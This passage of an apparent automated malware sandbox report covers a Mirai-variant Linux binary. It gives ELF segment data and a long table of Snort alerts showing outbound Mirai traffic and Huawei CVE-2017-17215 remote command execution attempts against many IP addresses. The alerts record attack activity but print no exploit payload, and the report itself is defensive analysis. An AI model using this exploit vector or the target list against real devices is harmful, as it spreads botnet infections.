                                                        .mdebug.abi32PROGBITS0x71a0x166880x00x00x0001
                                                        .shstrtabSTRTAB0x00x166880x640x00x0001

                                                        Program Segments

                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x4000000x4000000x15f200x15f205.49250x5R E0x10000.init .text .fini .rodata
                                                        LOAD0x160000x4560000x4560000x6880x9f04.00370x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        04/14/24-16:36:20.236685TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6010480192.168.2.2395.101.240.120
                                                        04/14/24-16:35:46.905684TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3903880192.168.2.2395.101.7.88
                                                        04/14/24-16:37:22.500041TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5952280192.168.2.2395.216.169.200
                                                        04/14/24-16:36:38.691987TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5866080192.168.2.23112.122.159.65
                                                        04/14/24-16:36:38.054988TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3550680192.168.2.2388.213.248.173
                                                        04/14/24-16:36:50.178611TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5280880192.168.2.2395.216.161.5
                                                        04/14/24-16:35:07.676645TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5695480192.168.2.23112.196.108.163
                                                        04/14/24-16:35:11.826436TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3351080192.168.2.2395.100.128.96
                                                        04/14/24-16:37:33.657007TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5711080192.168.2.2395.211.191.173
                                                        04/14/24-16:36:20.356061TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3353280192.168.2.2395.167.157.242
                                                        04/14/24-16:36:15.169178TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5876680192.168.2.2388.201.61.143
                                                        04/14/24-16:35:59.955561TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4076280192.168.2.2395.111.230.73
                                                        04/14/24-16:36:46.750907TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5038480192.168.2.2395.110.201.37
                                                        04/14/24-16:35:45.500066TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3322480192.168.2.2395.100.83.78
                                                        04/14/24-16:35:37.783240TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5324480192.168.2.2395.100.73.75
                                                        04/14/24-16:36:13.107224TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4805680192.168.2.23112.125.164.108
                                                        04/14/24-16:35:44.788895TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5674680192.168.2.23112.167.224.175
                                                        04/14/24-16:36:09.845717TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4763680192.168.2.2395.100.183.33
                                                        04/14/24-16:36:24.021055TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5598280192.168.2.23112.216.54.251
                                                        04/14/24-16:36:20.264042TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5738480192.168.2.2395.98.93.183
                                                        04/14/24-16:37:08.265276TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3953480192.168.2.2395.179.248.194
                                                        04/14/24-16:36:47.068794TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4852680192.168.2.2388.210.102.13
                                                        04/14/24-16:35:18.247931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327637215192.168.2.2341.42.21.212
                                                        04/14/24-16:35:04.281882TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5740680192.168.2.2388.153.60.68
                                                        04/14/24-16:36:50.332643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310837215192.168.2.23197.221.180.247
                                                        04/14/24-16:37:26.907675TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6012280192.168.2.2395.100.14.138
                                                        04/14/24-16:36:24.313063TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4743880192.168.2.23112.160.31.66
                                                        04/14/24-16:36:41.800021TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3871880192.168.2.2395.86.123.120
                                                        04/14/24-16:37:02.502251TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4067680192.168.2.2395.174.99.33
                                                        04/14/24-16:36:10.505850TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4626680192.168.2.23112.240.60.75
                                                        04/14/24-16:35:40.521483TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4900280192.168.2.2388.198.133.128
                                                        04/14/24-16:36:15.516801TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4439880192.168.2.23112.126.68.209
                                                        04/14/24-16:36:56.728759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540837215192.168.2.2341.47.63.217
                                                        04/14/24-16:36:20.244435TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5757280192.168.2.2395.80.205.108
                                                        04/14/24-16:36:56.050441TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5154680192.168.2.23112.136.164.10
                                                        04/14/24-16:35:30.387978TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4196680192.168.2.2395.131.50.39
                                                        04/14/24-16:36:32.257018TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4332080192.168.2.2395.166.126.21
                                                        04/14/24-16:37:02.074399TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5545680192.168.2.2395.173.100.142
                                                        04/14/24-16:34:54.088281TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5109080192.168.2.23112.168.155.32
                                                        04/14/24-16:35:04.281881TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4204480192.168.2.2395.239.77.161
                                                        04/14/24-16:35:30.207247TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5541080192.168.2.23112.121.166.214
                                                        04/14/24-16:35:26.030866TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5217280192.168.2.2388.249.14.162
                                                        04/14/24-16:35:04.322200TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3547280192.168.2.2388.112.224.190
                                                        04/14/24-16:36:11.438117TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3403080192.168.2.2388.119.193.246
                                                        04/14/24-16:35:55.000457TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3702880192.168.2.2388.204.207.169
                                                        04/14/24-16:36:20.252031TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5861680192.168.2.2395.164.39.48
                                                        04/14/24-16:36:04.018082TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5693680192.168.2.23112.74.184.114
                                                        04/14/24-16:36:26.267556TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5944680192.168.2.2395.216.8.180
                                                        04/14/24-16:36:56.728759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540837215192.168.2.2341.47.63.217
                                                        04/14/24-16:35:50.565718TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3786480192.168.2.2395.154.146.207
                                                        04/14/24-16:36:46.435738TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5834880192.168.2.2395.101.237.41
                                                        04/14/24-16:36:59.410669TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5229880192.168.2.23112.185.195.206
                                                        04/14/24-16:37:02.375186TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5114880192.168.2.2395.100.77.199
                                                        04/14/24-16:35:30.555525TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4266680192.168.2.2395.86.120.25
                                                        04/14/24-16:36:20.254920TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6063880192.168.2.2395.128.199.186
                                                        04/14/24-16:37:12.254502TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4653280192.168.2.23112.173.225.37
                                                        04/14/24-16:37:24.452395TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5285080192.168.2.2395.101.47.100
                                                        04/14/24-16:35:03.936919TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5977480192.168.2.2395.101.21.12
                                                        04/14/24-16:35:23.038587TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3747680192.168.2.2395.163.236.126
                                                        04/14/24-16:35:40.291744TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4396680192.168.2.2395.100.0.246
                                                        04/14/24-16:36:30.568903TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5562880192.168.2.2395.86.118.214
                                                        04/14/24-16:35:11.821698TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4793280192.168.2.2395.249.99.66
                                                        04/14/24-16:37:29.052528TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3516480192.168.2.23112.173.62.65
                                                        04/14/24-16:35:40.215950TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5392680192.168.2.2395.100.226.192
                                                        04/14/24-16:36:11.420213TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5740080192.168.2.2388.183.165.213
                                                        04/14/24-16:35:20.714233TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4170280192.168.2.2388.245.209.214
                                                        04/14/24-16:35:07.283636TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4464080192.168.2.2395.217.161.65
                                                        04/14/24-16:35:15.543181TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5400280192.168.2.2395.86.76.69
                                                        04/14/24-16:36:22.344998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6038680192.168.2.2395.100.188.43
                                                        04/14/24-16:35:37.199651TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4717880192.168.2.23112.163.104.233
                                                        04/14/24-16:35:56.728636TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4064480192.168.2.2395.101.174.24
                                                        04/14/24-16:35:47.843867TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3447280192.168.2.2395.170.155.166
                                                        04/14/24-16:35:06.983767TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5766480192.168.2.2388.147.6.252
                                                        04/14/24-16:37:33.663601TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3782280192.168.2.2395.101.203.45
                                                        04/14/24-16:35:17.429497TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5791080192.168.2.2395.101.221.109
                                                        04/14/24-16:34:57.000413TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4942080192.168.2.23112.124.186.161
                                                        04/14/24-16:36:18.587452TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3512680192.168.2.2395.46.157.132
                                                        04/14/24-16:36:32.252148TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5126080192.168.2.2395.100.81.16
                                                        04/14/24-16:36:11.420620TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5809680192.168.2.2388.215.215.157
                                                        04/14/24-16:35:30.375210TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4133680192.168.2.2395.211.107.91
                                                        04/14/24-16:35:40.524983TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3922680192.168.2.2388.208.6.245
                                                        04/14/24-16:37:24.165021TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4089480192.168.2.2395.216.68.58
                                                        04/14/24-16:37:16.959247TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4676880192.168.2.2395.217.165.216
                                                        04/14/24-16:36:22.238857TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4967280192.168.2.2395.101.242.160
                                                        04/14/24-16:36:56.502309TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3976680192.168.2.2388.198.110.53
                                                        04/14/24-16:36:38.067722TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5963680192.168.2.23112.125.127.42
                                                        04/14/24-16:36:07.214787TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4487480192.168.2.2388.197.28.193
                                                        04/14/24-16:36:32.642401TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5186480192.168.2.2395.57.65.116
                                                        04/14/24-16:36:56.610015TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5131680192.168.2.23112.49.30.164
                                                        04/14/24-16:36:32.642473TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5382080192.168.2.2395.57.54.199
                                                        04/14/24-16:35:06.962911TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4058280192.168.2.2388.99.32.152
                                                        04/14/24-16:35:40.285476TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3300280192.168.2.2395.57.137.36
                                                        04/14/24-16:36:21.595800TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4655280192.168.2.2395.0.117.93
                                                        04/14/24-16:36:50.819600TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4649280192.168.2.2388.28.197.41
                                                        04/14/24-16:35:59.963481TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3555880192.168.2.2395.217.154.177
                                                        04/14/24-16:36:10.804570TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4628880192.168.2.23112.240.60.75
                                                        04/14/24-16:36:38.343963TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3304880192.168.2.23112.163.49.112
                                                        04/14/24-16:36:42.580545TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5073080192.168.2.23112.196.61.73
                                                        04/14/24-16:37:30.635955TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5819480192.168.2.2388.93.161.143
                                                        04/14/24-16:37:11.649804TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3735080192.168.2.2395.86.78.186
                                                        04/14/24-16:35:42.150221TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4710480192.168.2.2395.100.190.60
                                                        04/14/24-16:36:15.169144TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5876880192.168.2.2388.201.61.143
                                                        04/14/24-16:36:18.935095TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5762680192.168.2.23112.74.55.225
                                                        04/14/24-16:36:56.046029TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3471080192.168.2.23112.161.195.128
                                                        04/14/24-16:37:30.507114TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4108880192.168.2.2388.214.196.232
                                                        04/14/24-16:36:10.190937TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5430280192.168.2.2388.221.62.159
                                                        04/14/24-16:34:56.720478TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3921280192.168.2.2395.101.114.42
                                                        04/14/24-16:36:26.231290TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4616680192.168.2.2395.100.186.32
                                                        04/14/24-16:36:47.372178TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5361880192.168.2.2388.214.20.17
                                                        04/14/24-16:35:57.059115TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4959280192.168.2.2395.128.203.39
                                                        04/14/24-16:37:02.109890TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5486280192.168.2.2395.180.163.70
                                                        04/14/24-16:36:35.399160TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3874680192.168.2.23112.74.112.174
                                                        04/14/24-16:37:08.272866TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5583680192.168.2.2395.101.200.220
                                                        04/14/24-16:37:02.441414TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5613280192.168.2.2395.181.226.68
                                                        04/14/24-16:37:21.857470TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5944280192.168.2.2388.218.158.102
                                                        04/14/24-16:35:47.548250TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4413080192.168.2.2395.216.203.187
                                                        04/14/24-16:36:21.648304TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5605480192.168.2.2395.100.3.93
                                                        04/14/24-16:37:24.518628TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4630880192.168.2.2395.171.228.198
                                                        04/14/24-16:36:04.021895TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5322080192.168.2.23112.74.166.241
                                                        04/14/24-16:37:28.759237TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5938680192.168.2.23112.196.77.145
                                                        04/14/24-16:35:35.568824TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5729680192.168.2.2395.100.114.52
                                                        04/14/24-16:37:04.210307TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4366080192.168.2.2395.85.212.248
                                                        04/14/24-16:35:21.365604TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5755880192.168.2.23112.125.190.145
                                                        04/14/24-16:36:10.804516TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4628480192.168.2.23112.240.60.75
                                                        04/14/24-16:37:24.188011TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5770480192.168.2.2395.254.169.71
                                                        04/14/24-16:37:07.977631TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3470080192.168.2.23112.28.200.40
                                                        04/14/24-16:36:09.899529TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4424080192.168.2.2395.100.119.168
                                                        04/14/24-16:36:20.274271TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4306080192.168.2.2395.164.172.28
                                                        04/14/24-16:37:12.205566TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3593880192.168.2.23112.164.61.99
                                                        04/14/24-16:37:35.643867TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5740280192.168.2.23112.197.114.2
                                                        04/14/24-16:36:41.742957TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3299480192.168.2.2395.101.252.171
                                                        04/14/24-16:37:26.926940TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5806680192.168.2.2395.57.68.134
                                                        04/14/24-16:36:30.892450TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5076280192.168.2.23112.197.148.238
                                                        04/14/24-16:36:54.408995TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4232680192.168.2.2388.129.13.196
                                                        04/14/24-16:37:26.198837TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5324080192.168.2.2388.254.27.158
                                                        04/14/24-16:35:54.208745TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3651480192.168.2.2388.99.174.216
                                                        04/14/24-16:37:12.265796TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3553680192.168.2.23112.173.143.61
                                                        04/14/24-16:36:35.690588TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4024280192.168.2.23112.147.130.77
                                                        04/14/24-16:35:35.587926TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4245680192.168.2.2395.216.99.183
                                                        04/14/24-16:35:12.149962TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5061680192.168.2.2395.56.128.52
                                                        04/14/24-16:35:17.727133TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4892280192.168.2.23112.216.25.60
                                                        04/14/24-16:36:59.135522TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5162680192.168.2.23112.136.164.10
                                                        04/14/24-16:36:46.756431TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3707880192.168.2.2395.216.29.212
                                                        04/14/24-16:36:11.441931TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5193280192.168.2.2388.135.184.155
                                                        04/14/24-16:37:26.186605TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6063080192.168.2.2388.80.145.71
                                                        04/14/24-16:35:42.142572TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5441280192.168.2.2395.101.201.65
                                                        04/14/24-16:36:13.418277TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4562880192.168.2.2388.221.5.184
                                                        04/14/24-16:36:18.598064TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5221680192.168.2.2395.101.156.153
                                                        04/14/24-16:37:24.168009TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3452080192.168.2.2395.142.160.11
                                                        04/14/24-16:36:50.156950TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4231880192.168.2.2395.129.213.226
                                                        04/14/24-16:37:17.263243TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3666280192.168.2.2388.83.99.166
                                                        04/14/24-16:37:31.442994TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3956280192.168.2.2395.85.19.102
                                                        04/14/24-16:37:00.386211TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3628080192.168.2.2388.101.25.207
                                                        04/14/24-16:37:10.995822TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5632680192.168.2.2388.99.36.250
                                                        04/14/24-16:37:21.564159TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5943080192.168.2.2388.218.158.102
                                                        04/14/24-16:37:02.417216TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4243880192.168.2.2395.90.22.30
                                                        04/14/24-16:36:29.908880TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3907880192.168.2.2388.221.79.146
                                                        04/14/24-16:35:40.492606TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5271280192.168.2.2388.207.209.221
                                                        04/14/24-16:37:19.255113TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3296680192.168.2.2395.140.226.12
                                                        04/14/24-16:37:21.532963TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5328080192.168.2.2388.208.223.88
                                                        04/14/24-16:35:40.197764TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4702080192.168.2.2395.101.250.61
                                                        04/14/24-16:37:12.664658TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4191880192.168.2.23112.133.234.127
                                                        04/14/24-16:35:29.737067TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5472880192.168.2.2395.47.252.137
                                                        04/14/24-16:35:54.804575TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3361680192.168.2.2388.126.142.168
                                                        04/14/24-16:35:57.071303TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5933280192.168.2.2395.31.211.36
                                                        04/14/24-16:35:15.511933TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4037080192.168.2.2395.216.146.164
                                                        04/14/24-16:36:53.540788TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4712880192.168.2.2395.100.51.159
                                                        04/14/24-16:36:47.430325TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4502280192.168.2.2388.248.22.141
                                                        04/14/24-16:37:05.138411TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5189280192.168.2.23112.136.164.10
                                                        04/14/24-16:37:10.994188TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4644680192.168.2.2388.99.226.56
                                                        04/14/24-16:36:58.412777TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4083480192.168.2.23112.184.189.138
                                                        04/14/24-16:36:15.838325TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3322080192.168.2.23112.133.231.202
                                                        04/14/24-16:37:02.144860TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5007680192.168.2.2395.170.154.82
                                                        04/14/24-16:37:02.437787TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3854680192.168.2.2395.42.26.205
                                                        04/14/24-16:35:46.916379TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5992080192.168.2.2395.101.220.145
                                                        04/14/24-16:36:05.559913TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5775680192.168.2.2388.99.132.131
                                                        04/14/24-16:35:18.432008TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5291880192.168.2.2395.86.97.213
                                                        04/14/24-16:35:46.912715TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4106480192.168.2.2395.85.215.125
                                                        04/14/24-16:35:38.468439TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5241680192.168.2.2395.100.208.211
                                                        04/14/24-16:37:19.581870TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5670080192.168.2.2395.217.45.36
                                                        04/14/24-16:36:31.658937TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5353680192.168.2.2395.46.192.184
                                                        04/14/24-16:35:12.490109TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4994480192.168.2.23112.30.175.107
                                                        04/14/24-16:36:38.691757TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5865880192.168.2.23112.122.159.65
                                                        04/14/24-16:34:56.708580TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5347880192.168.2.2395.216.100.196
                                                        04/14/24-16:34:56.832499TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4654080192.168.2.2395.100.31.195
                                                        04/14/24-16:35:15.543523TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5245280192.168.2.2395.10.12.103
                                                        04/14/24-16:35:11.768190TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6093080192.168.2.2395.168.217.15
                                                        04/14/24-16:35:54.500970TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5988080192.168.2.2388.173.190.85
                                                        04/14/24-16:35:23.012227TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3762080192.168.2.2395.100.117.80
                                                        04/14/24-16:36:26.242737TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5113480192.168.2.2395.128.73.12
                                                        04/14/24-16:37:17.588424TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3391280192.168.2.2388.134.101.53
                                                        04/14/24-16:36:04.801632TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4155080192.168.2.2395.100.218.149
                                                        04/14/24-16:36:47.395728TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5842280192.168.2.2388.17.252.123
                                                        04/14/24-16:36:30.529706TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5349280192.168.2.2395.100.33.29
                                                        04/14/24-16:37:02.088551TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5364080192.168.2.2395.216.225.145
                                                        04/14/24-16:37:14.484943TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4795480192.168.2.2395.101.56.83
                                                        04/14/24-16:37:19.556296TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5022480192.168.2.2395.80.201.246
                                                        04/14/24-16:35:46.922260TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5383080192.168.2.2395.63.34.246
                                                        04/14/24-16:35:07.712605TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5850680192.168.2.23112.92.61.28
                                                        04/14/24-16:36:15.406871TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3655480192.168.2.23112.126.97.200
                                                        04/14/24-16:36:09.891201TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4414280192.168.2.2395.171.29.14
                                                        04/14/24-16:34:56.979967TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4960680192.168.2.23112.181.148.65
                                                        04/14/24-16:35:47.556387TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3874280192.168.2.2395.217.73.211
                                                        04/14/24-16:37:08.316936TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5053680192.168.2.2395.107.62.145
                                                        04/14/24-16:34:56.711070TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3377480192.168.2.2395.216.232.251
                                                        04/14/24-16:37:21.547291TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4827880192.168.2.2388.198.52.89
                                                        04/14/24-16:35:37.823905TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5896680192.168.2.2395.214.235.82
                                                        04/14/24-16:35:56.428798TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5990880192.168.2.2388.173.190.85
